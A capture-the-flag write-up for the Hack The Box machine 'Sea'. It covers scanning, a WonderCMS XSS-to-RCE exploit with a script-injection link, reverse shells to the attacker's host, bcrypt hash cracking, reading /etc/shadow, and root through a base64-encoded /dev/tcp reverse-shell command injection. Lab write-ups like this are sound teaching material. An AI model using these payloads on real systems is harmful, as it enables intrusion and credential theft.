Hack the box: sea.htb
Table of Contents
#
$ nmap -p- -sCV 10.10.11.28 -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-20 14:24 EST
Warning: 10.10.11.28 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.28
Host is up (0.070s latency).
Not shown: 55008 closed tcp ports (conn-refused), 10525 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
| 256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
|_ 256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sea - Home
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 354.13 seconds
We see a web server hosted there so just running nikto just in case. Unfortunately, it did not gave use much result
$ upload nikto -C all -url http://10.10.11.28
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.11.28
+ Target Hostname: 10.10.11.28
+ Target Port: 80
+ Start Time: 2024-11-20 14:24:37 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /home/: This might be interesting.
+ 26612 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2024-11-20 14:42:45 (GMT-5) (1088 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
After running multiple gobuster
enumeration, was able to discover one of the the following version
$ 1120_sea.htb gobuster dir --url 'http://sea.htb/themes/bike/' --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://sea.htb/themes/bike/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/home (Status: 200) [Size: 3650]
/img (Status: 301) [Size: 239] [--> http://sea.htb/themes/bike/img/]
/version (Status: 200) [Size: 6]
/css (Status: 301) [Size: 239] [--> http://sea.htb/themes/bike/css/]
/summary (Status: 200) [Size: 66]
/404 (Status: 200) [Size: 3341]
/LICENSE (Status: 200) [Size: 1067]
Details of those files.
$ 1120_sea.htb curl http://sea.htb/themes/bike/version
3.2.0
And from after version we can obtain the License inforamtion
$ curl http://sea.htb/themes/bike//LICENSE
MIT License
Copyright (c) 2019 turboblack
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
After a quick google, we can see that the it has someting to do with Wonder CMS and we can also see and XSS to RCE can be obtained
In the script we can see that it is trying to download the file from the github which the victim machine does not have access to. Thus we will be changing the path to our machine from where we will be hosting the reverseshell file.
After the script modification, we can see the call is being made. However, even after that I was not able to obtain a reverse shell.
$python3 exploit.py 'http://sea.htb/loginURL' 10.10.14.188 9002
[+] xss.js is created
[+] execute the below command in another terminal
----------------------------
nc -lvp 9002
----------------------------
send the below link to admin:
----------------------------
http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.14.188:8000/xss.js"></script><form+action="
----------------------------
starting HTTP server to allow the access to xss.js
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.28 - - [30/Nov/2024 22:54:06] "GET /xss.js HTTP/1.1" 200 -
10.10.11.28 - - [30/Nov/2024 22:54:14] "GET /revshell-main.zip HTTP/1.1" 200 -
10.10.11.28 - - [30/Nov/2024 22:54:14] "GET /revshell-main.zip HTTP/1.1" 200 -
10.10.11.28 - - [30/Nov/2024 22:54:14] "GET /revshell-main.zip HTTP/1.1" 200 -
10.10.11.28 - - [30/Nov/2024 22:54:14] "GET /revshell-main.zip HTTP/1.1" 200 -
10.10.11.28 - - [30/Nov/2024 23:11:55] "GET /linpeas.sh HTTP/1.1" 200 -
Open reverseshell in another window
$ nc -nvlp 9002
And in another run the below command:
http://sea.htb//themes/revshell-main/rev.php?lhost=10.10.14.188&lport=9002
From the web directory we can see that there is a database file which contains a hash.
"password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",
For some strange reason, if you do echo
and then pipe the command into the txt file, that would work but if the hash is being pasted into the hashes file and then we run the command then we would not see anything.
$hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-skylake-avx512-AMD Ryzen 9 7900X 12-Core Processor, 6941/13947 MB (2048 MB allocatable), 18MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q:mychemicalromance
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM...DnXm4q
Time.Started.....: Sun Dec 1 10:51:51 2024 (7 secs)
Time.Estimated...: Sun Dec 1 10:51:58 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 451 H/s (5.36ms) @ Accel:18 Loops:8 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3240/14344385 (0.02%)
Rejected.........: 0/3240 (0.00%)
Restore.Point....: 2916/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1016-1024
Candidate.Engine.: Device Generator
Candidates.#1....: captain -> kissme1
Started: Sun Dec 1 10:51:32 2024
Stopped: Sun Dec 1 10:51:59 2024
We can now use this creds to login to the system as amay
.
From further enumeration we can see that a service is running in locahost’s 8080 port and as we can ssh into the machine with amay’s creds, we can easily forwad the port in the attacker machine and access that service.
After again using password reuse, we can assess the portal and change the path to /etc/passwd
and can view the results.
</form>
systemd-network:*:19430:0:99999:7:::
systemd-resolve:*:19430:0:99999:7:::
systemd-timesync:*:19430:0:99999:7:::
systemd-coredump:!!:19774::::::
amay:$6$S1AGe5ex2k4D5MKa$gTclSeJwvND3FINpZaK0zfUqk6T9IkhlxCn17fNWLx56u.zP/f/4e5YrJRPsM3TRuuKXQDfYL44RyPzduexsm.:19775:0:99999:7:::
<p class='error'>Suspicious traffic patterns detected in /etc/shadow:</p><pre>amay:$6$S1AGe5ex2k4D5MKa$gTclSeJwvND3FINpZaK0zfUqk6T9IkhlxCn17fNWLx56u.zP/f/4e5YrJRPsM3TRuuKXQDfYL44RyPzduexsm.:19775:0:99999:7:::</pre> </div>
It is also possible to inject command into the system and again get a reverse shell by appending ;
and a base64 encoded shell c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTg4LzkwMDEgMD4mMQ%3D%3D%7Cbase64%20%2Dd%7Cbash
.
We get shell
root@sea:~/monitoring# cd /root
cd /root
root@sea:~# ll
ll
total 44
drwx------ 7 root root 4096 Dec 1 16:58 ./
drwxr-xr-x 19 root root 4096 Feb 21 2024 ../
lrwxrwxrwx 1 root root 9 Aug 1 12:12 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwx------ 2 root root 4096 Aug 14 15:25 .cache/
drwxr-xr-x 2 root root 4096 Feb 25 2024 monitoring/
drwx------ 3 root root 4096 Feb 21 2024 .pki/
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r----- 1 root root 33 Dec 1 16:58 root.txt
drwxr-xr-x 2 root root 4096 Aug 1 12:17 scripts/
drwx------ 2 root root 4096 Feb 21 2024 .ssh/
-rw------- 1 root root 797 Aug 5 07:17 .viminfo
root@sea:~# cat root.txt
cat root.txt
<SNIPPED>
root@sea:~# ⏎
Thanks for visiting.